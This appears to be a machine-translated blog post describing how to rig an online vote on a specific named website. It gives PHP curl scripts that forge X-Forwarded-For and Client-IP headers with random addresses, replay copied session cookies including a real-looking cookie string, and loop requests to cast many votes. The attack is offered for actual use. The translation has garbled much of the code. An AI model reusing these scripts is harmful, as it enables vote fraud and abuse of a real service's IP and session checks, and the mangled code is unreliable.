Cause:
My colleague's friend's sister wants to participate in any voting activity and wants me to help brush the ticket. I agreed with my research attitude. I would like to share with you the ideas on ticket swiping.
Thoughts:
First, websites generally use IP addresses for voting. If the IP address can be forged, the ticket swiping function can be implemented.
Let's take a look at the PHP open-source project discuz's function of getting IP addresses:
// Obtain the client ipfunction get_ip () {If (getenv ('HTTP _ client_ip ') & strcasecmp (getenv ('HTTP _ client_ip'), 'unknown ')) {$ IP = getenv ('HTTP _ client_ip ');} elseif (getenv ('HTTP _ x_forwarded_for') & strcasecmp (getenv ('HTTP _ x_forwarded_for '), 'unknon') {$ IP = getenv ('HTTP _ x_forwarded_for ');} elseif (getenv ('remote _ ADDR ') & strcasecmp (getenv ('remote _ ADDR '), 'unknown') {$ IP = getenv ('remote _ ADDR ');} elseif ( Isset ($ _ server ['remote _ ADDR ']) & $ _ server ['remote _ ADDR'] & strcasecmp ($ _ server ['remote _ ADDR '], 'unknown ') {$ IP = $ _ server ['remote _ ADDR'];} return preg_match ('/[\ D \.] {7, 15}/', $ IP, $ matches )? $ Matches [0]: '';}
In the code, the http_client_ip variable is obtained first, which can be forged. This requires PHP curl extension.
Baidu's curl usage, the simplest use of curl to forge IP code is as follows:
$ CH = curl_init (); curl_setopt ($ ch, curlopt_url, "http: // localhost/2.php"); $ A = rand (1,255); $ B = rand (1,255 ); $ c = revert (1, 50); $ d = rand (1,255); $ IP = "$. $ B. $ C. $ D "; // dynamically generate the IP address curl_setopt ($ ch, curlopt_httpheader, array ('x-forwarded-:'. $ IP, 'client-IP :'. $ IP); // construct ipcurl_setopt ($ ch, curlopt_referer, "http://www.baidu.com"); // construct the origin curl_setopt ($ ch, curlopt_header, 1 ); $ out = curl_exec ($ ch); curl_close ($ ch );
In this way, through curl, we can forge an IP address. It seems that we have understood the theoretical basis of ticket swiping. Now we can use this code to implement ticket swiping.
First Attempt:
First, vote normally once,
According to firebug of Firefox, we can see that the voting operation uses Ajax post submission, with the parameters tid and type respectively. The previous Code was submitted for the get method. It seems that we need to modify the code so that curl supports the POST method. The modified code is as follows:
$ Url = "http://www.officeshow.cn/vote.php"; $ a = rand (1,255); $ B = rand (1,255); $ c = rand (1, 50 ); $ d = rand (1,255); $ ip = "$. $ B. $ c. $ d "; $ ch = curl_init (); curl_setopt ($ ch, CURLOPT_POST, 1); curl_setopt ($ ch, CURLOPT_URL, $ url); curl_setopt ($ ch, CURLOPT_HTTPHEADER, array ('x-FORWARDED-:'. $ ip, 'client-IP :'. $ ip); // construct the IP curl_setopt ($ ch, CURLOPT_REFERER, "http://www.gosoa.com.cn/"); // construct the origin curl_setopt ($ ch, CURLOPT_HEADER, 0 ); $ out = curl_exec ($ ch); curl_close ($ ch); exit;
After the above Code is completed, let's try to brush the ticket! Running this PHP file fails! Then we will continue to explore.
Done successfully:
Many websites use cookies and sessions to store user information. In other words, they are stored locally in cookies. Although this vote does not require logon, many websites have cookie information when they are opened. Check the cookie of this site. The blogger uses Firefox.
We found that this domain has two cookie values: bd1__firstime and PHPSESSID. Firefox we can get these two cookie values. Then we pass these two cookie values through curl. Then the server will think this is a normal request, and our ticket flushing function will be completed. Try the following code:
$ Url = "http://www.officeshow.cn/vote.php"; $ A = rand (1,255); $ B = rand (1,255); $ c = rand (1, 50 ); $ d = rand (1,255); $ IP = "$. $ B. $ C. $ D "; $ cookie =" bd1__firstime = 1367826762029; PHPSESSID = Taobao "; // set the cookie value $ CH = curl_init (); curl_setopt ($ ch, curlopt_post, 1 ); curl_setopt ($ ch, curlopt_url, $ URL); curl_setopt ($ ch, curlopt_httpheader, array ('x-forwarded-:'. $ IP, 'client-IP :'. $ IP, 'cookie :'. $ cookie); // construct the IP curl_setopt ($ ch, curlopt_referer, "http://www.baidu.com"); // construct the origin curl_setopt ($ ch, curlopt_postfields, 'tid = 2200 & type = 1'); curl_setopt ($ ch, curlopt_header, 0); ob_start (); $ out = curl_exec ($ ch ); $ result = ob_get_contents (); ob_end_clean (); curl_close ($ ch); echo json_encode (getd ('id'); exit;
Run the code. Successful!
Batch operation:
The ticket flushing code has been completed. The following is a batch operation. Batch operation is actually a for loop, but a request browser has the maximum time limit, which is inconvenient.
I used ajax to loop requests, so that we can get all the votes.
Extension:
The most important thing to do is to pass the cookie to the ticket. In fact, you can send all the headers of normal browser requests during the request, because you cannot determine what kind of judgment is set on the server side. You can view the header information through firebug. Then, use curl to pass all the header information.
curl_setopt($ch, CURLOPT_HTTPHEADER, array( "Cookie:stQE_45b4_saltkey=njAO8S3G; stQE_45b4_lastvisit=1367823144; stQE_45b4_visitedfid=62D66D79D63; pgv_pvi=9600479659; __utma=29738476.2090210183.1367826762.1367826762.1367826762.1; __utmz=29738476.1367826762.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bdshare_firstime=1367826762029; stQE_45b4_sid=DG6gx1; stQE_45b4_lastact=1368695577%09forum.php%09viewthread; stQE_45b4_viewid=tid_2200; PHPSESSID=b681ua42r0gpst2gvth6irh9a7; pgv_info=ssi=s2710992270; stQE_45b4_sendmail=1; stQE_45b4_forum_lastvisit=D_63_1368695475D_2_1368695494", 'Host:'.'bbs.officeshow.cn', "Referer:http://bbs.officeshow.cn/forum.php?mod=viewthread&tid=2200", "X-Requested-With: XMLHttpRequest", 'X-FORWARDED-FOR:'.$ip, 'CLIENT-IP:'.$ip, 'X-Requested-With:XMLHttpRequest'));
Postscript:
If the SERVER determines that the IP address is using $ _ SERVER ['remote _ ADDR '], then this method will be ineffective.